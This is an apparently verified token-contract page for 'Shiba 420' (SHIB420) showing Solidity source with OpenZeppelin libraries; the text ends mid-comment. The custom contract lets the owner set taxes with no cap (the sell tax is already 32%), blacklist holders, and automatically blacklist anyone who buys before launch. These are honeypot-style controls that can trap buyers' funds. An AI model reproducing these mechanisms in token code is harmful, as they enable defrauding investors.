ETH Price: $3,332.59 (-0.32%)

Token

Shiba 420.0 (SHIB420)
 

Overview

Max Total Supply

100,000,000 SHIB420

Holders

16

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
940,499.999999999905 SHIB420

Value
$0.00
0x559d0a8eecc55a1973946c998289c760edf92491
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Shib420

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
File 1 of 7 : Shib420.sol
// SPDX-License-Identifier: UNLICENSED

pragma solidity ^0.8.18;

import "@openzeppelin/contracts/utils/Address.sol";
import "@openzeppelin/contracts/utils/Context.sol";
import "@openzeppelin/contracts/access/Ownable.sol";
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
}

interface IUniswapV2Router02 {
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
}


contract Shib420 is ERC20, Ownable {
    // Info? are you sure?
    uint256 private ReflactionaryTotal;

    // Routing to nowhere
    IUniswapV2Router02 public UniswapV2Router;

    // Important addresses
    address payable private DevAddress =
        payable(0x3c9016BCb063DE91Bb67834A3ee42c9A7A4AB21D);
    address payable private MarketingAddress =
        payable(0x3c9016BCb063DE91Bb67834A3ee42c9A7A4AB21D);

    uint256 public HardCap;
    uint256 public HardCapBuy;
    uint256 public HardCapSell;

    uint256 private LiquidityThreshold;

    mapping(address => uint256) private BalancesRefraccionarios;
    mapping(address => uint256) private BalancesReales;
    mapping(address => bool) public Bots;

    mapping(address => bool) public WalletsExcludedFromFee;
    mapping(address => bool) public WalletsExcludedFromHardCap;
    mapping(address => bool) public AutomatedMarketMakerPairs;

    uint256 public TotalFee;
    uint256 public TotalSwapped;
    uint256 public TotalTokenBurn;

    bool private AreWeLive = false;

    bool private InSwap = false;
    bool private SwapEnabled = true;
    bool private AutoLiquidity = true;

    // Tax rates
    struct TaxRates {
        uint256 BurnTax;
        uint256 LiquidityTax;
        uint256 MarketingTax;
        uint256 DevelopmentTax;
        uint256 RewardTax;
    }

    // Fees, which are amounts calculated based on tax
    struct TransactionFees {
        uint256 TransactionFee;
        uint256 BurnFee;
        uint256 DevFee;
        uint256 MarketingFee;
        uint256 LiquidityFee;
        uint256 TransferrableFee;
        uint256 TotalFee;
    }

    TaxRates public BuyingTaxes =
        TaxRates({
            RewardTax: 0,
            BurnTax: 0,
            DevelopmentTax: 0,
            MarketingTax: 5,
            LiquidityTax: 0
        });

    TaxRates public SellTaxes =
        TaxRates({
            RewardTax: 0,
            BurnTax: 0,
            DevelopmentTax: 0,
            MarketingTax: 32,
            LiquidityTax: 0
        });

    TaxRates public AppliedRatesPercentage = BuyingTaxes;

    TransactionFees private AccumulatedFeeForDistribution =
        TransactionFees({
            DevFee: 0,
            MarketingFee: 0,
            LiquidityFee: 0,
            BurnFee: 0,
            TransferrableFee: 0,
            TotalFee: 0,
            TransactionFee: 0
        });

    // Events
    event setDevAddress(address indexed previous, address indexed adr);
    event setMktAddress(address indexed previous, address indexed adr);
    event LiquidityAdded(uint256 tokenAmount, uint256 ETHAmount);
    event TreasuryAndDevFeesAdded(uint256 devFee, uint256 treasuryFee);
    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);
    event BlacklistedUser(address botAddress, bool indexed value);
    event MaxWalletAmountUpdated(uint256 amount);
    event ExcludeFromMaxWallet(address account, bool indexed isExcluded);
    event SwapAndLiquifyEnabledUpdated(bool _enabled);

    constructor(
        address swap,
        string memory name,
        string memory symbol
    ) ERC20(name, symbol) {
        UniswapV2Router = IUniswapV2Router02(swap);

        address PancakeSwapAddress = IUniswapV2Factory(
            UniswapV2Router.factory()
        ).createPair(address(this), UniswapV2Router.WETH());

        AutomatedMarketMakerPairs[PancakeSwapAddress] = true;

        WalletsExcludedFromFee[address(this)] = true;
        WalletsExcludedFromFee[DevAddress] = true;
        WalletsExcludedFromFee[MarketingAddress] = true;
        WalletsExcludedFromFee[swap] = true;
        WalletsExcludedFromFee[msg.sender] = true;
        WalletsExcludedFromFee[
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        ] = true;

        WalletsExcludedFromHardCap[address(this)] = true;
        WalletsExcludedFromHardCap[DevAddress] = true;
        WalletsExcludedFromHardCap[MarketingAddress] = true;
        WalletsExcludedFromHardCap[PancakeSwapAddress] = true;
        WalletsExcludedFromHardCap[swap] = true;
        WalletsExcludedFromHardCap[
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        ] = true;
        WalletsExcludedFromHardCap[msg.sender] = true;

        // Minting total supply
        _mint(msg.sender, 100_000_000*10**18);
        // Approving swap for LP
        _approve(address(this), address(UniswapV2Router), ~uint256(0));

        ReflactionaryTotal = (~uint256(0) - (~uint256(0) % totalSupply()));
        BalancesRefraccionarios[msg.sender] = ReflactionaryTotal;

        HardCap = totalSupply();
        HardCapSell = totalSupply();
        HardCapBuy =  totalSupply();
        LiquidityThreshold = (totalSupply() * 5) / 10_000;
    }

    function ChangeTaxes(TaxRates memory newTaxes, bool buying)
        public
        onlyOwner
    {
        if (buying) {
            BuyingTaxes = newTaxes;
            return;
        }
        SellTaxes = newTaxes;
    }

    function SetAutoLiquidity(bool newFlag) public {
        require(
            msg.sender == DevAddress || msg.sender == owner(),
            "Only developers can change this flag"
        );
        AutoLiquidity = newFlag;
    }

    function swapTokensForETH(uint256 tokenAmount) private {
        // generate the pair path of token
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = UniswapV2Router.WETH();

        // make the swap
        UniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0, // accept any amount of ETH
            path,
            address(this),
            block.timestamp
        );
    }

    function withdraw() public {
        uint256 ethBalance = address(this).balance;
        bool success;
        (success, ) = address(DevAddress).call{value: ethBalance}("");
    }

    function WeAreLive() public onlyOwner {
        AreWeLive = true;
    }

    function ChangeExcludeFromFeeToForWallet(address add, bool isExcluded)
        public
        onlyOwner
    {
        WalletsExcludedFromFee[add] = isExcluded;
    }

    function ChangeDevAddress(address payable newDevAddress) public onlyOwner {
        address oldAddress = DevAddress;
        emit setDevAddress(oldAddress, newDevAddress);
        ChangeExcludeFromFeeToForWallet(DevAddress, false);
        DevAddress = newDevAddress;
        ChangeExcludeFromFeeToForWallet(DevAddress, true);
    }

    function ChangeMarketingAddress(address payable marketingAddress)
        public
        onlyOwner
    {
        address oldAddress = MarketingAddress;
        emit setMktAddress(oldAddress, marketingAddress);
        ChangeExcludeFromFeeToForWallet(MarketingAddress, false);
        MarketingAddress = marketingAddress;
        ChangeExcludeFromFeeToForWallet(MarketingAddress, true);
    }

    function balanceOf(address account) public view override returns (uint256) {
        return tokenFromReflection(BalancesRefraccionarios[account]);
    }

    function MarkBot(address targetAddress, bool isBot) public onlyOwner {
        Bots[targetAddress] = isBot;
        emit BlacklistedUser(targetAddress, isBot);
    }

    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal override {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        require(!Bots[sender], "ERC20: address blacklisted (bot)");
        require(amount > 0, "Transfer amount must be greater than zero");
        require(
            amount <= balanceOf(sender),
            "You are trying to transfer more than your balance"
        );

        bool takeFee = !(WalletsExcludedFromFee[sender] || WalletsExcludedFromFee[recipient]);

        if (takeFee) {

            if (AutomatedMarketMakerPairs[sender]) {
                // Not so fast ma boi
                if (!AreWeLive) {
                    Bots[recipient] = true;
                }

                AppliedRatesPercentage = BuyingTaxes;
                require(
                    amount <= HardCapBuy,
                    "amount must be <= maxTxAmountBuy"
                );
            } else {
                AppliedRatesPercentage = SellTaxes;
                require(
                    amount <= HardCapSell,
                    "amount must be <= maxTxAmountSell"
                );
            }
        }

        if (
            !InSwap &&
            !AutomatedMarketMakerPairs[sender] &&
            SwapEnabled &&
            sender != owner() &&
            recipient != owner() &&
            sender != address(UniswapV2Router) &&
            balanceOf(address(this)) >= LiquidityThreshold
        ) {
            InSwap = true;
            SwapAccumulatedFees();
            InSwap = false;
        }

        _tokenTransfer(sender, recipient, amount, takeFee);
    }

    // This method is responsible for taking all fee, if takeFee is true
    function _tokenTransfer(
        address sender,
        address recipient,
        uint256 cantidadBruta,
        bool takeFee
    ) private {
        TransactionFees memory feesReales;
        TransactionFees memory feesRefracionarios;
        (feesReales, feesRefracionarios) = CalcularTasasRealesYRefracionarias(
            cantidadBruta,
            takeFee
        );

        uint256 cantidadNeta = cantidadBruta - feesReales.TotalFee;
        uint256 cantidadBrutaRefracionaria = cantidadBruta *
            GetConversionRate();
        uint256 cantidadNetaRefracionaria = cantidadBrutaRefracionaria -
            feesRefracionarios.TotalFee;

        // Comprobando que el receptor de la transferencia no supere el hard cap de tokens
        require(
            WalletsExcludedFromHardCap[recipient] ||
                (balanceOf(recipient) + cantidadNeta) <= HardCap,
            "Recipient cannot hold more than maxWalletAmount"
        );

        BalancesRefraccionarios[sender] -= cantidadBrutaRefracionaria;
        BalancesRefraccionarios[recipient] += cantidadNetaRefracionaria;

        if (takeFee) {
            ReflactionaryTotal -= feesRefracionarios.TransactionFee;
            TotalFee += feesReales.TransactionFee;

            AccumulateFee(feesReales, feesRefracionarios);

            if (AppliedRatesPercentage.BurnTax > 0) {
                TotalTokenBurn += feesReales.BurnFee;
                BalancesRefraccionarios[address(0)] += feesRefracionarios
                    .BurnFee;
                emit Transfer(address(this), address(0), feesReales.BurnFee);
            }

            emit Transfer(sender, address(this), feesReales.TransferrableFee);
        }

        emit Transfer(sender, recipient, cantidadNeta);
    }

    function CalcularTasasRealesYRefracionarias(
        uint256 grossAmount,
        bool takeFee
    )
        private
        view
        returns (
            TransactionFees memory realFees,
            TransactionFees memory refFees
        )
    {
        if (takeFee) {
            uint256 currentRate = GetConversionRate();

            realFees.TransactionFee =
                (grossAmount * AppliedRatesPercentage.RewardTax) /
                100;
            realFees.BurnFee =
                (grossAmount * AppliedRatesPercentage.BurnTax) /
                100;
            realFees.DevFee =
                (grossAmount * AppliedRatesPercentage.DevelopmentTax) /
                100;
            realFees.MarketingFee =
                (grossAmount * AppliedRatesPercentage.MarketingTax) /
                100;
            realFees.LiquidityFee =
                (grossAmount * AppliedRatesPercentage.LiquidityTax) /
                100;

            realFees.TransferrableFee =
                realFees.DevFee +
                realFees.MarketingFee +
                realFees.LiquidityFee;
            realFees.TotalFee =
                realFees.TransactionFee +
                realFees.BurnFee +
                realFees.TransferrableFee;

            refFees.TransactionFee = realFees.TransactionFee * currentRate;
            refFees.BurnFee = realFees.BurnFee * currentRate;
            refFees.DevFee = realFees.DevFee * currentRate;
            refFees.MarketingFee = realFees.MarketingFee * currentRate;
            refFees.LiquidityFee = realFees.LiquidityFee * currentRate;

            refFees.TotalFee = realFees.TotalFee * currentRate;
            refFees.TransferrableFee = realFees.TransferrableFee * currentRate;
        }
    }

    function AccumulateFee(
        TransactionFees memory realFees,
        TransactionFees memory refractionaryFees
    ) private {
        BalancesRefraccionarios[address(this)] += refractionaryFees
            .TransferrableFee;
        AccumulatedFeeForDistribution.LiquidityFee += realFees.LiquidityFee;
        AccumulatedFeeForDistribution.DevFee += realFees.DevFee;
        AccumulatedFeeForDistribution.MarketingFee += realFees.MarketingFee;
    }

    function SwapPct(uint256 pct) public {
        uint256 balance = (balanceOf(address(this)) * pct) / 100;
        if (balance > 0) {
            SwapTokens(balance);
        }
    }

    function SwapTokens(uint256 tokensToSwap) internal {
        uint256 totalTokensToSwap = AccumulatedFeeForDistribution.DevFee +
            AccumulatedFeeForDistribution.MarketingFee +
            AccumulatedFeeForDistribution.LiquidityFee;

        bool success;

        uint256 liquidityTokens = (tokensToSwap *
            AccumulatedFeeForDistribution.LiquidityFee) /
            totalTokensToSwap /
            2;
        uint256 amountToSwapForETH = tokensToSwap - (liquidityTokens);
        uint256 initialETHBalance = address(this).balance;
        swapTokensForETH(amountToSwapForETH);

        uint256 ethBalance = address(this).balance - (initialETHBalance);

        uint256 ethForMarketing = (ethBalance *
            (AccumulatedFeeForDistribution.MarketingFee)) / (totalTokensToSwap);
        uint256 ethForDev = (ethBalance *
            (AccumulatedFeeForDistribution.DevFee)) / (totalTokensToSwap);

        uint256 ethForLiquidity = ethBalance - ethForMarketing - ethForDev;

        TotalSwapped += AccumulatedFeeForDistribution.LiquidityFee;
        AccumulatedFeeForDistribution.LiquidityFee = 0;
        AccumulatedFeeForDistribution.DevFee = 0;
        AccumulatedFeeForDistribution.MarketingFee = 0;

        (success, ) = address(DevAddress).call{value: ethForDev}("");

        if (
            liquidityTokens > 0 && ethForLiquidity > 0 && AutoLiquidity == true
        ) {
            UniswapV2Router.addLiquidityETH{value: ethForLiquidity}(
                address(this),
                liquidityTokens,
                0, // slippage is unavoidable
                0, // slippage is unavoidable
                DevAddress,
                block.timestamp
            );
            emit LiquidityAdded(liquidityTokens, ethForLiquidity);
        }

        (success, ) = address(MarketingAddress).call{value: ethForMarketing}(
            ""
        );
    }

    function SwapAccumulatedFees() private {
        uint256 tokensToSwap = balanceOf(address(this));
        if (tokensToSwap > LiquidityThreshold) {
            if (tokensToSwap > LiquidityThreshold * 20) {
                tokensToSwap = LiquidityThreshold * 20;
            }
            SwapTokens(balanceOf(address(this)));
        }
    }

    function tokenFromReflection(uint256 reflactionaryAmount)
        public
        view
        returns (uint256)
    {
        require(
            reflactionaryAmount <= ReflactionaryTotal,
            "Amount must be less than total reflections"
        );
        return reflactionaryAmount / GetConversionRate();
    }

    function GetConversionRate() private view returns (uint256) {
        return ReflactionaryTotal / totalSupply();
    }

    function setSwapAndLiquifyEnabled(bool _enabled) public onlyOwner {
        SwapEnabled = _enabled;
        emit SwapAndLiquifyEnabledUpdated(_enabled);
    }

    receive() external payable {}
}

File 2 of 7 : Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

import "../utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 3 of 7 : ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";
import "./extensions/IERC20Metadata.sol";
import "../../utils/Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

File 4 of 7 : IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

import "../IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 5 of 7 : IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

File 6 of 7 : Address.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.8.0) (utils/Address.sol)

pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
